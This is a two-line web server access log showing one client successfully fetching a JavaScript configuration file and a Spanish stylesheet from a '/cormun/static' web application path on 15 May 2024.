190.171.149.82 - - [15/May/2024:11:59:54 -0300] "GET /cormun/static/gxcfg.js?201991420132062 HTTP/1.1" 200 953
190.171.149.82 - - [15/May/2024:11:59:54 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?19172979 HTTP/1.1" 200 100853
